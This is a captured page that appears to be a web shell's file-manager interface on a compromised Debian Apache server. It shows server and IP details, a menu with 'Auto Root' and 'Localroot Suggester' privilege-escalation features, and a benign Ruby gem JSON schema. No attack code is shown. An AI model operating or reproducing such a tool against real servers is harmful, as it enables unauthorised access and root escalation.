Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
ruby /
gems /
3.1.0 /
gems /
rbs-2.1.0 /
schema /
Delete
Unzip
Name
Size
Permission
Date
Action
annotation.json
350
B
-rw-r--r--
2022-04-12 11:11
comment.json
492
B
-rw-r--r--
2022-04-12 11:11
decls.json
7.27
KB
-rw-r--r--
2022-04-12 11:11
function.json
2.03
KB
-rw-r--r--
2022-04-12 11:11
location.json
1.01
KB
-rw-r--r--
2022-04-12 11:11
members.json
5.91
KB
-rw-r--r--
2022-04-12 11:11
methodType.json
887
B
-rw-r--r--
2022-04-12 11:11
typeParam.json
792
B
-rw-r--r--
2022-04-12 11:11
types.json
6.59
KB
-rw-r--r--
2022-04-12 11:11
Save
Rename
{ "$schema": "http://json-schema.org/draft-04/schema#", "definitions": { "point": { "type": "object", "properties": { "line": { "type": "integer" }, "column": { "type": "integer" } }, "required": ["line", "column"] }, "buffer": { "type": "object", "properties": { "name": { "oneOf": [ { "type": "string" }, { "type": "null" } ] } }, "required": ["name"] }, "location": { "type": "object", "properties": { "start": { "$ref": "#/definitions/point" }, "end": { "$ref": "#/definitions/point" }, "buffer": { "$ref": "#/definitions/buffer" } }, "required": ["start", "end", "buffer"] } }, "oneOf": [ { "$ref": "#/definitions/location" }, { "type": "null" } ] }